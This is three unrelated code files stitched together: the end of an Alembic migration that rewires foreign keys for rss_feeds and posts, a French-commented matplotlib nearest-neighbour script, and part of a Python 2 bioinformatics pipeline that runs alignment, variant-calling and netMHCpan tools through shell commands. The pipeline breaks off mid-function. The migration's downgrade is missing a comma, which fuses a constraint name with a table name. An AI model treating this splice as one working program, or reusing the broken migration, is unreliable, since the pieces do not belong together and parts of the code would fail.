op.create_foreign_key(
"rss_feeds_category_id_fkey",
"rss_feeds",
"categories",
["category_id"],
["id"],
ondelete="SET NULL",
)
def downgrade():
op.drop_constraint("rss_feeds_category_id_fkey", "rss_feeds",
type_="foreignkey")
op.create_foreign_key(
"rss_feeds_category_id_fkey",
"rss_feeds",
"categories",
["category_id"],
["id"],
)
op.drop_constraint("posts_rss_feed_id_fkey", "posts", type_="foreignkey")
op.create_foreign_key(
"posts_rss_feed_id_fkey"
"posts",
"rss_feeds",
["rss_feed_id"],
["id"],
)
|
import random
import math
import matplotlib.pyplot as plt
import matplotlib.colors
import numpy as np
np.random.seed(19680801)
N = 1000
fig, ax = plt.subplots()
dots = np.arange(N)
# Ici, Grid est pas super utile
class Grid:
def __init__(self, size_x, size_y):
self.size_x, self.size_y = size_x, size_y
self.grid = [[ random.randrange(0,N) for x in range(size_x)] for y in range(size_y)]
def see(self):
# https://stackoverflow.com/a/17871279
print('\n'.join([''.join(['{:4}'.format(item) for item in row]) for row in self.grid]))
def get(self):
return self.grid
a = Grid(N,1)
b = Grid(N,1)
data = [a.get(), b.get()]
ax.scatter(*data, c=data[1])
ax.plot(a.get(), b.get())
def onclick_bt1(event):
# check
for it in range(N):
# l'inférieur ou égal à ln(N) est pas trop dégueulasse, sauf quand N est trop petit ou beaucoup trop grand. N = 1000 et autour c'est pas dégueu
if abs(round(event.xdata) - a.get()[0][it]) <= math.log(N) and abs(round(event.ydata) - b.get()[0][it]) <= math.log(N):
print("TOUCHE")
points = list(zip(a.get(), b.get()))
# https://stackoverflow.com/a/60241070
def distance(a,b):
return(sum([(k[0]-k[1])**2 for k in zip(a,b)])**0.5)
def onclick_bt2(event):
dists = [distance([event.xdata, event.ydata],k) for k in points]
print(sorted(dists[0])[1]) # pour avoir le deuxième plus petit élément (donc faut au moins deux éléments)
def get_nearest_point_distance(point):
dists = []
for j in range(0, len(points[0][0])):
#print([points[0][0][j], points[0][1][j]])
dists.append(distance([point[0], point[1]], [points[0][0][j], points[0][1][j]]))
return(sorted(dists)[1]) # pour avoir le deuxième plus petit élément (donc faut au moins deux éléments)
# tres bruteforce :
for i in range(0, N):
#plt.plot(a.get()[i], b.get()[i])
#print([a.get()[i][i], b.get()[i][i]])
#print([a.get()[i][i+1], b.get()[i][i+1]])
#print(distance([a.get()[i][i], b.get()[i][i]], [a.get()[i][i+1], b.get()[i][i+1]]))
#print(get_nearest_point_distance([a.get()[i][i], b.get()[i][i]]))
for j in range(0, N):
#print(str(a.get()[i][j]) + " " + str(b.get()[i][j]))
# print(distance([a.get()[i][j], b.get()[i][j]], [a.get()[i][j+1], b.get()[i][j+1]])) essai : ça marche ça (sauf que pb à la fin d'index)
#dists = [distance([a.get()[i][j], b.get()[i][j]],k) for k in points]
#print([a.get()[i][j], b.get()[i][j]])
#print([a.get()[i][j+1], b.get()[i][j+1]])
#print(distance([a.get()[i][j], b.get()[i][j]], [a.get()[i][j+1], b.get()[i][j+1]]))
#print(get_nearest_point_distance([a.get()[i][j], b.get()[i][j]])) # GNE
#print("hello")
if distance([a.get()[0][i], b.get()[0][i]], [a.get()[0][j], b.get()[0][j]]) == get_nearest_point_distance([a.get()[0][i], b.get()[0][i]]):
plt.plot([a.get()[0][i], a.get()[0][j]], [b.get()[0][i], b.get()[0][j]])
print("ON EN A TROUVE UN")
print("?3")
fig.canvas.mpl_connect('button_press_event', onclick_bt1)
fig.canvas.mpl_connect('button_press_event', onclick_bt2)
plt.show()
|
#// //#
#// _oo0oo_ //#
#// o8888888o //#
#// 88" . "88 //#
#// (| -_- |) //#
#// 0\ = /0 //#
#// ___/`---'\___ //#
#// .' \\| |// '. //#
#// / \\||| : |||// \ //#
#// / _||||| -:- |||||- \ //#
#// | | \\\ - /// | | //#
#// | \_| ''\---/'' |_/ | //#
#// \ .-\__ '-' ___/-. / //#
#// ___'. .' /--.--\ `. .'___ //#
#// ."" '< `.___\_<|>_/___.' >' "". //#
#// | | : `- \`.;`\ _ /`;.`/ - ` : | | //#
#/ \ \ `_. \_ __\ /__ _/ .-` / / //#
#// =====`-.____`.___ \_____/___.-`___.-'===== //#
#// `=---=' //#
#// //#
#// //#
#// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ //#
#// //#
#// //#
import os,sys,time
import multiprocessing
import shutil
import subprocess
import pandas as pd
from pyper import *
import numpy as np
import math
from sklearn import preprocessing
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from sklearn.semi_supervised import label_propagation
import itertools
from scipy import linalg
import matplotlib as mpl
from sklearn import mixture
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from imblearn.under_sampling import RandomUnderSampler
from imblearn.metrics import classification_report_imbalanced
from Bio.Blast import NCBIXML
from Bio import pairwise2
from Bio.SubsMat import MatrixInfo as matlist
from math import log, exp
import pandas as pd
import math
import numpy as np
from scipy import interp
from sklearn.metrics import roc_curve, auc
from sklearn.model_selection import StratifiedKFold
import xgboost as xgb
from xgboost.sklearn import XGBClassifier
from sklearn import cross_validation, metrics
from sklearn.grid_search import GridSearchCV
import matplotlib.pylab as plt
from sklearn.model_selection import train_test_split
from Bio.Blast import NCBIXML
from Bio import pairwise2
from Bio.SubsMat import MatrixInfo as matlist
from math import log, exp
import subprocess
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
from imblearn.over_sampling import SMOTE
from collections import Counter
from sklearn.cross_validation import cross_val_score
a=26
k=4.86936
M=1. #default concentration of mutant peptides
W=1. #default concentration of wildtype peptides
WEPS=0.0003
HYDROPHOBIC_RESIDUES="AILMFWYV"
WEIRD_RESIDUES="CGP"
hydro_score={"A":1.8,"C":2.5,"D":-3.5,"E":-3.5,"F":2.8,"G":-0.4,"H":-3.2,"I":4.5,"K":-3.9,"L":3.8,"M":1.9,"N":-3.5,"P":-1.6,"Q":-3.5,"R":-4.5,"S":-0.8,"T":-0.7,"V":4.2,"W":-0.9,"Y":-1.3}
def get_iedb_seq(iedb_file):
iedb_seq=[]
for line in open(iedb_file):
if line.startswith(">"):
continue
else:
iedb_seq.append(line.strip())
return iedb_seq
def read_trimmomatic(raw_fastq_path_first,raw_fastq_path_second,trimmomatic_path,adapter_path,fastq_prefix,logfile_fold,fastq_type,CPU):
cmd_trimmomatic="java -jar " + trimmomatic_path + " PE -phred33 -threads " + str(CPU) + ' ' + raw_fastq_path_first + ' ' + raw_fastq_path_second + ' -baseout ' + fastq_prefix + " ILLUMINACLIP:" + adapter_path + ':2:30:10' + ' LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15 > ' + logfile_fold + '/' + fastq_type + '_trimmomatic.log' + ' 2>&1'
print cmd_trimmomatic
os.system(cmd_trimmomatic)
def hlatyping(raw_fastq_path_first,raw_fastq_path_second,opitype_fold,opitype_out_fold,opitype_ext,prefix):
cmd_hla = 'python ' + opitype_fold + ' -i ' + raw_fastq_path_first + ' ' + raw_fastq_path_second + ' --dna -o ' + opitype_out_fold
print cmd_hla
os.system(cmd_hla)
result_dir=os.listdir(opitype_out_fold)
print result_dir[0]
hla_result_path=opitype_out_fold+'/'+result_dir[0]+'/'+result_dir[0]+'_result.tsv'
print hla_result_path
cmd_hla_ext = 'python ' + opitype_ext + ' -i ' + hla_result_path + ' -o ' + opitype_out_fold + ' -s ' + prefix
print cmd_hla_ext
os.system(cmd_hla_ext)
print 'hla type process done.'
def mapping_qc_gatk_preprocess(fastq_1_path,fastq_2_path,fastq_type,CPU,BWA_INDEX,GENOME,alignment_out_fold,prefix,REFERENCE,bwa_path,samtools_path,java_picard_path,GATK_path,dbsnp138,OneKG,mills,logfile_fold,bamstat_out_fold):
cmd_bwa=bwa_path + ' mem -t '+ str(CPU) + ' ' + BWA_INDEX + '/' + GENOME + ' ' + fastq_1_path + ' ' +fastq_2_path + ' > ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.sam'
cmd_samtools_1=samtools_path + ' view -bhS -@ '+ str(CPU) + ' ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.sam' + ' > ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.bam'
cmd_samtools_sort=samtools_path + ' sort -@ ' + str(CPU) + ' -m 2G ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.bam' + ' ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_unfilter'
cmd_samtools_index_1=samtools_path + ' index ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_unfilter.bam'
cmd_select_chr=samtools_path + ' view -b -@ ' + str(CPU) + ' ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_unfilter.bam' + ' chr1 chr2 chr3 chr4 chr5 chr6 chr7 chr8 chr9 chr10 chr11 chr12 chr13 chr14 chr15 chr16 chr17 chr18 chr19 chr20 chr21 chr22 chrX chrY > ' + alignment_out_fold+'/' + prefix + '_'+fastq_type+'.bam'
cmd_samtools_2=samtools_path + ' index ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.bam'
cmd_picard="java -Xmx4G -jar " + java_picard_path + ' MarkDuplicates INPUT=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.bam' + ' OUTPUT=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter.bam' + ' METRICS_FILE=' + alignment_out_fold+'/'+prefix + '_'+fastq_type+'_dup_qc.txt ASSUME_SORTED=true VALIDATION_STRINGENCY=SILENT > ' + logfile_fold + '/' + fastq_type + '_markdup.log' + ' 2>&1'
cmd_samtools_index_2=samtools_path + ' index ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter.bam'
cmd_add_readgroup="java -Xmx4G -jar " + java_picard_path + ' AddOrReplaceReadGroups I=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter.bam' + ' O=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' SO=coordinate VALIDATION_STRINGENCY=SILENT RGID=' + fastq_type + ' RGLB=' + fastq_type + ' RGPL=illumina RGSM='+ fastq_type + ' RGPU=NextSeq > ' + logfile_fold + '/' + fastq_type + '_addreadgroup.log' + ' 2>&1'
cmd_buildbamindex="java -Xmx4G -jar " + java_picard_path + ' BuildBamIndex I=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' O=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam.bai' + ' VALIDATION_STRINGENCY=SILENT > ' + logfile_fold + '/' + fastq_type + '_buildindex.log' + ' 2>&1'
cmd_RealignerTargetCreator="java -Xmx4G -jar " + GATK_path + ' -T RealignerTargetCreator -nt '+ str(CPU) + ' -dt NONE -R ' + REFERENCE + ' -I '+ alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' -known ' + OneKG + ' -known ' + mills + ' -filterRNC -o ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.intervals > ' + logfile_fold + '/' + fastq_type + '_RealignerTargetCreator.log' + ' 2>&1'
cmd_IndelRealigner="java -Xmx4G -jar " + GATK_path + ' -T IndelRealigner -R ' + REFERENCE + ' -I ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' -known ' + OneKG + ' -known ' + mills + ' -targetIntervals ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.intervals' + ' -filterRNC -o ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add_realign.bam > ' + logfile_fold + '/' + fastq_type + '_IndelRealigner.log' + ' 2>&1'
cmd_BaseRecalibrator="java -Xmx4G -jar " + GATK_path + ' -T BaseRecalibrator -nct ' + str(CPU) + ' -R ' + REFERENCE + ' -I ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add_realign.bam' + ' -knownSites ' + OneKG + ' -knownSites ' + mills + ' -knownSites ' + dbsnp138 + ' -o ' + alignment_out_fold + '/' + prefix + '_'+fastq_type + '.table > ' + logfile_fold + '/' + fastq_type + '_BaseRecalibrator.log' + ' 2>&1'
cmd_PrintReads="java -Xmx4G -jar " + GATK_path + ' -T PrintReads -nct 8 -dt NONE -R ' + REFERENCE + ' -I ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add_realign.bam' + ' -BQSR ' + alignment_out_fold + '/' + prefix + '_'+fastq_type + '.table' + ' -o ' + alignment_out_fold + '/' + prefix + '_'+fastq_type + '_recal.bam > ' + logfile_fold + '/' + fastq_type + '_PrintRead.log' + ' 2>&1'
#cmd_edwBamStats="edwBamStats " + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.bam' bamstat_out_fold + '/' + prefix + fastq_type +'_edwBamStats.txt'
print cmd_bwa
os.system(cmd_bwa)
print cmd_samtools_1
os.system(cmd_samtools_1)
print cmd_samtools_sort
os.system(cmd_samtools_sort)
print cmd_samtools_index_1
os.system(cmd_samtools_index_1)
print cmd_select_chr
os.system(cmd_select_chr)
print cmd_samtools_2
os.system(cmd_samtools_2)
print cmd_picard
os.system(cmd_picard)
print cmd_samtools_index_2
os.system(cmd_samtools_index_2)
print cmd_add_readgroup
os.system(cmd_add_readgroup)
print cmd_buildbamindex
os.system(cmd_buildbamindex)
print cmd_RealignerTargetCreator
os.system(cmd_RealignerTargetCreator)
print cmd_IndelRealigner
os.system(cmd_IndelRealigner)
print cmd_BaseRecalibrator
os.system(cmd_BaseRecalibrator)
print cmd_PrintReads
os.system(cmd_PrintReads)
def sentieon_preprocess(prefix,tumor_fastq_1_path,tumor_fastq_2_path,normal_fastq_1_path,normal_fastq_2_path,alignment_out_fold,somatic_out_fold,vcftools_path,vep_path,vep_cache_path,netmhc_out_path,tumor_depth_cutoff,tumor_vaf_cutoff,normal_vaf_cutoff):
cmd_sentieon="bash /home/zhouchi/software/sentieon-genomics-201704.03/doc/pipeline-example-tumor_normal.sh" + ' ' + prefix + ' ' + tumor_fastq_1_path + ' ' + tumor_fastq_2_path + ' ' + normal_fastq_1_path + ' ' + normal_fastq_2_path + ' ' + alignment_out_fold
print cmd_sentieon
os.system(cmd_sentieon)
cmd_mutation_filter='grep ' + "\'^#\|chr[1-9]\{0,1\}[0-9XY]\\{0,1\\}\\b\'" + ' ' + alignment_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper.vcf' + ' > ' + alignment_out_fold + '/' + prefix + '-' + 'output-tnhaplotyper-filter.vcf'
print cmd_mutation_filter
os.system(cmd_mutation_filter)
os.system('mv ' + alignment_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper-filter.vcf ' + somatic_out_fold)
cmd_vcftools_snv=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper-filter.vcf' + " --remove-filtered-all --remove-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only'
cmd_vcftools_indel=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '-'+ 'output-tnhaplotyper-filter.vcf' + " --remove-filtered-all --keep-only-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'INDELs_only'
print cmd_vcftools_snv
print cmd_vcftools_indel
os.system(cmd_vcftools_snv)
os.system(cmd_vcftools_indel)
cmd_snv_filter="python ${iTuNES_BIN_PATH}/snv_filter.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only.recode.vcf' + " -d " + str(tumor_depth_cutoff) + " -v " + str(tumor_vaf_cutoff) + " -n " + str(normal_vaf_cutoff) + " -o " + somatic_out_fold + " -s " + prefix
print cmd_snv_filter
os.system(cmd_snv_filter)
cmd_vep_snv=vep_path + " -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_filter.vcf' + " --cache --dir " + vep_cache_path + " --dir_cache " + vep_cache_path + " --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter \"CANONICAL is YES and Consequence is missense_variant\" -o " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " --force_overwrite"
print cmd_vep_snv
os.system(cmd_vep_snv)
cmd_vep_indel=vep_path + " -i " + somatic_out_fold + '/' + prefix + '_'+ 'INDELs_only.recode.vcf' + " --cache --dir " + vep_cache_path + " --dir_cache " + vep_cache_path + " --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter \"CANONICAL is YES and Consequence is missense_variant\" -o " + somatic_out_fold + '/' + prefix + '_'+ 'mutect_indel_vep_ann.txt' + " --force_overwrite"
print cmd_vep_indel
os.system(cmd_vep_indel)
cmd_snv="python ${iTuNES_BIN_PATH}/snv2fasta.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " -o " + netmhc_out_path + " -s " + prefix
print cmd_snv
os.system(cmd_snv)
def GATK_mutect2(GATK_path,REFERENCE,alignment_out_fold,prefix,CPU,dbsnp138,cosmic,somatic_out_fold,vcftools_path,vep_path,vep_cache_path,netmhc_out_path):
#cmd_GATK="java -Xmx4G -jar " + GATK_path + ' -T MuTect2 -nct ' + str(CPU) + ' -R ' + REFERENCE + ' -L chr1' + ' -I:tumor ' + alignment_out_fold + '/' + prefix + '_'+ 'tumor.bam ' + '-I:normal ' + alignment_out_fold + '/' + prefix + '_'+ 'normal.bam ' + '--dbsnp ' + dbsnp138 + ' --cosmic ' + cosmic + ' -o ' + somatic_out_fold + '/' + prefix + '_'+ 'mutect2.vcf'
cmd_GATK="java -Xmx4G -jar " + GATK_path + ' -T MuTect2 -nct ' + str(CPU) + ' -R ' + REFERENCE + ' -I:tumor ' + alignment_out_fold + '/' + prefix + '_'+ 'tumor_recal.bam ' + '-I:normal ' + alignment_out_fold + '/' + prefix + '_'+ 'normal_recal.bam ' + '--dbsnp ' + dbsnp138 + ' --cosmic ' + cosmic + ' -o ' + somatic_out_fold + '/' + prefix + '_'+ 'mutect2.vcf'
print cmd_GATK
#os.system(cmd_GATK)
cmd_mutation_filter='grep ' + "\'^#\|chr[1-9]\{0,1\}[0-9XY]\\{0,1\\}\\b\'" + ' ' + alignment_out_fold + '/' + prefix + '_mutect2.vcf' + ' > ' + alignment_out_fold + '/' + prefix + '_' + 'mutect2_filter.vcf'
print cmd_mutation_filter
os.system(cmd_mutation_filter)
cmd_vcftools_snv=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '_'+ 'mutect2_filter.vcf' + " --remove-filtered-all --remove-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only'
cmd_vcftools_indel=vcftools_path + " --vcf " + somatic_out_fold + '/' + prefix + '_'+ 'mutect2_filter.vcf' + " --remove-filtered-all --keep-only-indels --recode --recode-INFO-all --not-chr chrM --out " + somatic_out_fold + '/' + prefix + '_'+ 'INDELs_only'
print cmd_vcftools_snv
print cmd_vcftools_indel
os.system(cmd_vcftools_snv)
#os.system(cmd_vcftools_indel)
cmd_snv_filter="python ${iTuNES_BIN_PATH}/snv_filter.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only.recode.vcf' + " -d " + str(tumor_depth_cutoff) + " -v " + str(tumor_vaf_cutoff) + " -n " + str(normal_vaf_cutoff) + " -o " + somatic_out_fold + " -s " + prefix
print cmd_snv_filter
os.system(cmd_snv_filter)
cmd_vep=vep_path + " -i " + somatic_out_fold + '/' + prefix + '_'+ 'SNVs_only.recode.vcf' + " --cache --dir " + vep_cache_path + " --dir_cache " + vep_cache_path + " --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter \"CANONICAL is YES and Consequence is missense_variant\" -o " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " --force_overwrite"
print cmd_vep
os.system(cmd_vep)
cmd_snv="python ${iTuNES_BIN_PATH}/snv2fasta.py -i " + somatic_out_fold + '/' + prefix + '_'+ 'snv_vep_ann.txt' + " -o " + netmhc_out_path + " -s " + prefix
print cmd_snv
os.system(cmd_snv)
def netMHCpan(fasta_file,hla_str,netmhc_out_file,out_dir,split_num,netMHCpan_path,tmp_dir):
str_proc=r'''
set -x
input_fasta=%s
hla_str=%s
netmhc_out=%s
out_dir=%s
split_num=%s
netMHCpan=%s
tmp=%s
if [ -d ${out_dir}/${tmp} ];then
rm -rf ${out_dir}/${tmp}
mkdir -p ${out_dir}/${tmp}
else
mkdir -p ${out_dir}/${tmp}
fi
if [ -f ${netmhc_out} ];then
rm ${netmhc_out}
fi
split -l ${split_num} ${input_fasta} ${out_dir}/${tmp}/
filelist=`ls ${out_dir}/${tmp}/`
arr1=(${filelist})
echo ${arr1[@]}
OLD_IFS="$IFS"
IFS=","
arr2=(${hla_str})
IFS="$OLD_IFS"
for s in ${arr2[@]}
do
{
echo $s
for file_l in ${arr1[@]}
do
{
echo ${file_l}n
$netMHCpan -a $s -f ${out_dir}/${tmp}/${file_l} -l 9,10 -BA > ${out_dir}/${tmp}/${s}_${file_l}_tmp_netmhc.txt
} &
done
wait
}
done
for file_l in ${arr1[@]}
do
{
rm ${out_dir}/${tmp}/${file_l}
}
done
filelist1=`ls ${out_dir}/${tmp}/`
for file_r in $filelist1
do
{
cat ${out_dir}/${tmp}/${file_r} >> ${netmhc_out}
rm ${out_dir}/${tmp}/${file_r}
}
done
rm -rf ${out_dir}/${tmp}
set +x
'''%(fasta_file,hla_str,netmhc_out_file,out_dir,split_num,netMHCpan_path,tmp_dir)
subprocess.call(str_proc, shell=True, executable='/bin/bash')
def varscan_somatic_caling_drift(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,samtools_path,varscan_path,vep_path,netmhc_out_fold,logfile_fold):
str_proc = r'''
set -e
somat_f=%s
alignment_fold=%s
PREFIX=%s
REFERENCE=%s
vep_cache=%s
netmhc_out=%s
samtools=%s
varscan=%s
vep=%s
logfile_fold=%s
if [ ! -d ${somat_f} ];then
mkdir ${somat_f}
fi
if [ ! -d ${netmhc_out} ];then
mkdir ${netmhc_out}
fi
#rm -rf ${somat_f}/*
cd ${somat_f}
mkfifo ${PREFIX}_normal.fifo
mkfifo ${PREFIX}_tumor.fifo
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_normal_recal.bam > ${PREFIX}_normal.fifo &
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_tumor_recal.bam > ${PREFIX}_tumor.fifo &
java -jar $varscan somatic ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo ${PREFIX} #> ${logfile_fold}/${PREFIX}_somatic.log #>2&1 #--output-vcf 1
java -jar $varscan processSomatic ${PREFIX}.snp
grep '^chrom\|chr[1-9]\{0,1\}[0-9XY]\{0,1\}\b' ${PREFIX}.snp > ${PREFIX}_filter.snp
rm ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo
cd ..
#sed '1d' ${somat_f}/${PREFIX}.snp.Somatic | awk -F '\t' '{print $1,$2,$2,$3"/"$4}' > ${somat_f}/${PREFIX}_snv_vep_input.vcf
#$vep -i ${somat_f}/${PREFIX}_snv_vep_input.vcf --cache --dir $vep_cache --dir_cache $vep_cache --force_overwrite --symbol -o STDOUT --offline | filter_vep --ontology --filter "Consequence is missense_variant" -o ${somat_f}/${PREFIX}_snv_vep_ann.txt --force_overwrite
#python ${iTuNES_BIN_PATH}/snv2fasta.py -i ${somat_f}/${PREFIX}_snv_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}
'''%(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,samtools_path,varscan_path,vep_path,logfile_fold)
print str_proc
subprocess.call(str_proc, shell=True, executable='/bin/bash')
#def varscan_somatic_caling_drift(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,samtools_path,varscan_path,vep_path,netmhc_out_fold,logfile_fold):
# str_proc = r'''
#set -e
#somat_f=%s
#alignment_fold=%s
#PREFIX=%s
#REFERENCE=%s
#vep_cache=%s
#netmhc_out=%s
#samtools=%s
#varscan=%s
#vep=%s
#logfile_fold=%s
#if [ ! -d ${somat_f} ];then
# mkdir ${somat_f}
#fi
#if [ ! -d ${netmhc_out} ];then
# mkdir ${netmhc_out}
#fi
#rm -rf ${somat_f}/*
#cd ${somat_f}
#mkfifo ${PREFIX}_normal.fifo
#mkfifo ${PREFIX}_tumor.fifo
#$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_normal_recal.bam > ${PREFIX}_normal.fifo &
#$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_tumor_recal.bam > ${PREFIX}_tumor.fifo &
#java -jar $varscan somatic ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo ${PREFIX} > ${logfile_fold}/${PREFIX}_somatic.log #>2&1 #--output-vcf 1
#java -jar $varscan processSomatic ${PREFIX}.snp
#rm ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo
#cd ..
#sed '1d' ${somat_f}/${PREFIX}.snp.Somatic | awk -F '\t' '{print $1,$2,$2,$3"/"$4}' > ${somat_f}/${PREFIX}_snv_vep_input.vcf
#$vep -i ${somat_f}/${PREFIX}_snv_vep_input.vcf --cache --dir $vep_cache --dir_cache $vep_cache --force_overwrite --symbol -o STDOUT --offline | filter_vep --ontology --filter "Consequence is missense_variant" -o ${somat_f}/${PREFIX}_snv_vep_ann.txt --force_overwrite
#python ${iTuNES_BIN_PATH}/snv2fasta.py -i ${somat_f}/${PREFIX}_snv_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}
#'''%(somatic_mutation_fold,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,samtools_path,varscan_path,vep_path,logfile_fold)
# print str_proc
# subprocess.call(str_proc, shell=True, executable='/bin/bash')
def varscan_neo(snv_fasta_file,hla_str,snv_netmhc_out_file,netmhc_out_fold,split_num,prefix,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,netctl_fold,netMHCpan_path):
netMHCpan(snv_fasta_file,hla_str,snv_netmhc_out_file,netmhc_out_fold,split_num,netMHCpan_path,'tmp_snv')
str_proc1=r'''
PREFIX=%s
netmhc_out=%s
Exp_file=%s
Binding_Aff_Fc_Cutoff=%d
Binding_Aff_Cutoff=%d
Fpkm_Cutoff=%d
hla_str=%s
netctl_fold=%s
python ${iTuNES_BIN_PATH}/sm_netMHC_result_parse.py -i ${netmhc_out}/${PREFIX}_snv_netmhc.txt -g ${netmhc_out}/${PREFIX}_snv.fasta -o ${netmhc_out} -s ${PREFIX}_snv -e ${Exp_file} -a ${Binding_Aff_Fc_Cutoff} -b ${Binding_Aff_Cutoff} -f ${Fpkm_Cutoff} -l ${hla_str}
python ${iTuNES_BIN_PATH}/netCTLPAN.py -i ${netmhc_out}/${PREFIX}_snv_final_neo_candidate.txt -o ${netctl_fold} -s ${PREFIX}_snv
'''%(prefix,netmhc_out_fold,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,hla_str,netctl_fold)
print str_proc1
subprocess.call(str_proc1, shell=True, executable='/bin/bash')
def indel_calling_drift(strelka_out_fold,strelka_path,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,CPU,vep_path):
str_proc2=r'''
set -e
strelka_fold=%s
strelka_path=%s
alignment_fold=%s
PREFIX=%s
REFERENCE=%s
vep_cache=%s
netmhc_out=%s
cpu=%s
vep=%s
if [ -d ${strelka_fold} ];then
rm -rf ${strelka_fold}
fi
python ${strelka_path}/configureStrelkaSomaticWorkflow.py --tumorBam=${alignment_fold}/${PREFIX}_tumor_recal.bam --normalBam=${alignment_fold}/${PREFIX}_normal_recal.bam --referenceFasta=${REFERENCE} --config=${strelka_path}/configureStrelkaSomaticWorkflow.py.ini --runDir=${strelka_fold} --exome
python ${strelka_fold}/runWorkflow.py -m local -j $cpu -q ${PREFIX}_strelka -g 32 --quiet
gunzip ${strelka_fold}/results/variants/somatic.indels.vcf.gz
vcftools --vcf ${strelka_fold}/results/variants/somatic.indels.vcf --remove-filtered-all --keep-only-indels --recode --recode-INFO-all --not-chr chrM --out ${strelka_fold}/${PREFIX}_INDELs_only
$vep -i ${strelka_fold}/${PREFIX}_INDELs_only.recode.vcf --cache --dir ${vep_cache} --dir_cache ${vep_cache} --force_overwrite --canonical --symbol -o STDOUT --offline | filter_vep --ontology --filter "CANONICAL is YES and Consequence is coding_sequence_variant" -o ${strelka_fold}/${PREFIX}_strelka_indel_vep_ann.txt --force_overwrite
python ${iTuNES_BIN_PATH}/varscandel2fasta.py -i ${strelka_fold}/${PREFIX}_strelka_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_strelka
python ${iTuNES_BIN_PATH}/varscanins2fasta.py -i ${strelka_fold}/${PREFIX}_strelka_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_strelka
'''%(strelka_out_fold,strelka_path,alignment_out_fold,PREFIX,REFERENCE,vep_cache,netmhc_out_fold,CPU,vep_path)
print str_proc2
subprocess.call(str_proc2, shell=True, executable='/bin/bash')
def indel_neo(somatic_mutation_fold,PREFIX,vep_cache,netmhc_out_fold,vep_path,indel_fasta_file,hla_str,indel_netmhc_out_file,split_num,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,netctl_fold,netMHCpan_path,strelka_fold):
str_proc1='''
somatic_mutation=%s
PREFIX=%s
vep_cache=%s
netmhc_out=%s
